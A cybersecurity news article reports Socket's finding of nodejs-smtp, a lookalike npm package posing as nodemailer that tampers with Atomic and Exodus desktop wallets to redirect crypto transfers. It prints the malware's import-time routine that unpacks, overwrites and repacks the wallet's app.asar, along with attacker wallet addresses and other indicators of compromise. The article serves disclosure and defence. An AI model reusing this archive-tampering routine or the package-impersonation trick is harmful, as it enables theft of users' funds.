Categories: Cyber Security News

Crypto Heist via npm – Fake Nodemailer Package Exploits 3.9M Weekly Downloads

A newly discovered supply chain attack has weaponized a lookalike npm package to silently drain desktop cryptocurrency wallets on Windows machines.

The threat, uncovered by Socket’s Threat Research Team, leverages a malicious package named nodejs-smtp, which impersonates the legitimate and widely adopted email library nodemailer.

Table of Contents

Toggle

From Mailer to Wallet Drainer

With approximately 3.9 million weekly downloads, Nodemailer is a staple for Node.js developers seeking SMTP functionality.

The malicious package boasting a nearly identical README, tagline, and API surface uses Electron tooling to infiltrate desktop wallets such as Atomic Wallet and Exodus.

Socket AI Scanner’s metadata comparison shows the malicious nodejs-smtp package (left) with 342 total downloads, while the legitimate nodemailer package (right) is widely adopted, with millions of weekly downloads.

On import, nodejs-smtp unpacks the application’s app.asar archive, overwrites a core vendor bundle with threat actor code, repackages the archive, and deletes its temporary workspace, leaving no obvious trace.

Under the hood, the patch routine executes as follows:

javascriptconst resDir  = path.join(os.homedir(), 'AppData', 'Local', 'Programs', 'atomic', 'resources');
const asarIn  = path.join(resDir, 'app.asar');
const workDir = path.join(resDir, 'output');
await asar.extractAll(asarIn, workDir);
await fs.copyFile(path.join(__dirname, 'a.js'),
                  path.join(workDir, 'dist', 'electron', 'vendors.64b69c3b00e2a7914733.js'));
await asar.createPackage(workDir, asarIn);
await fs.rm(workDir, { recursive: true, force: true });

This import-time execution sidesteps typical developer scrutiny, since nodejs-smtp still functions as an SMTP client and passes existing application tests.

Silent Transaction Hijacking

Once the wallet application loads the tampered archive, the malicious payload (a.js) intercepts outgoing transactions.

Socket AI Scanner flags nodejs-smtp (top image) as known malware. The package copies the nodemailer (bottom image) tagline, page styling, and README, impersonating the legitimate project to evade casual inspection and mislead developers.

It validates the user’s password and then programmatically replaces the intended recipient address with one controlled by the attacker. A mapping based on coin tickers ensures support for multiple currencies:

BTC → 17CNLs7rHnnBsmsCWoTq7EakGZKEp5wpdy
ETH/USDT (ERC-20) → 0x26Ce898b746910ccB21F4C6316A5e85BCEa39e24
TRX-USDT → TShimPsmriHr2GVL7ktVWofMBWCKU5aV8a
XRP → rh3UuQvbnBXSSXhSp3KEb98YhnU2JnXXhK
SOL/SOLToken → 47iMzKY8KfqgawsT3Xm4cBoRZYx6PQpCae3978GFHxSV

With the wallet UI appearing normal and no additional prompts, victims continue to send funds that are unknowingly diverted into the attacker’s wallets.

Outlook and Recommendations

Although the malicious npm alias nikotimon (registration email: darkhorse.tech322@gmail.com) has only accumulated a small number of transactions so far, the campaign’s modular design and multi-chain support suggest a scalable threat.

The payload persists until users reinstall the wallet from official sources. To combat such sophisticated supply chain attacks, organizations should adopt real-time package scanning and enforce security policies at both development and CI/CD stages.

Socket’s suite of defenses, including its GitHub App, CLI, and browser extension, flags side-effectful imports, filesystem writes, and archive manipulations before they can infiltrate production code.

Code assistants and AI-driven development tools must also incorporate stricter validation of suggested dependencies to prevent the introduction of lookalike packages.

As JavaScript package ecosystems continue to grow, defenders must remain vigilant against increasingly subtle tactics that turn benign utilities into potent attack vectors.

Indicators of Compromise (IOCs)

Malicious npm Package

nodejs-smtp

Threat Actor’s npm Alias and Registration Email

nikotimon
darkhorse.tech322@gmail[.]com

Threat Actor’s Wallet Addresses

BTC: 17CNLs7rHnnBsmsCWoTq7EakGZKEp5wpdy
ETH and USDT on Ethereum: 0x26Ce898b746910ccB21F4C6316A5e85BCEa39e24
TRX USDT on TRON: TShimPsmriHr2GVL7ktVWofMBWCKU5aV8a
XRP: rh3UuQvbnBXSSXhSp3KEb98YhnU2JnXXhK
SOL and SOLToken: 47iMzKY8KfqgawsT3Xm4cBoRZYx6PQpCae3978GFHxSV

MITRE ATT&CK Techniques

T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain
T1036.005 — Masquerading: Match Legitimate Resource Name or Location

Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates

The post Crypto Heist via npm – Fake Nodemailer Package Exploits 3.9M Weekly Downloads appeared first on Cyber Security News.

Malicious npm Package Mimics as Popular Nodemailer with Weekly 3.9 Million Downloads to Hijack Crypto Transactions

Security researchers at Socket.dev uncovered a sophisticated supply chain attack in late August 2025 leveraging a malicious npm package named nodejs-smtp, which masquerades as the widely used email library nodemailer, boasting approximately 3.9 million weekly downloads. At first glance, nodejs-smtp operates identically to its legitimate counterpart, supplying a familiar API…

September 1, 2025

In "Cyber Security News"

Hackers Use AI to Create Malicious NPM Package that Drains Your Crypto Wallet

Cybercriminals have escalated their attack sophistication by leveraging artificial intelligence to create a malicious NPM package that masquerades as a legitimate development tool while secretly draining cryptocurrency wallets. The package, named @kodane/patch-manager, presents itself as an “NPM Registry Cache Manager” offering license validation and registry optimization features, but harbors a…

August 4, 2025

In "Cyber Security News"

Hackers Hijacked 18 Very Popular npm Packages With 2 Billion Weekly Downloads

In the largest supply chain attack, hackers compromised 18 popular npm packages, which together account for over two billion downloads per week. The attack, which began on September 8th, involved injecting malicious code designed to steal cryptocurrency from users. The compromised packages include widely used libraries such as chalk, debug,…

September 9, 2025

In "Cyber Security News"

rssfeeds-admin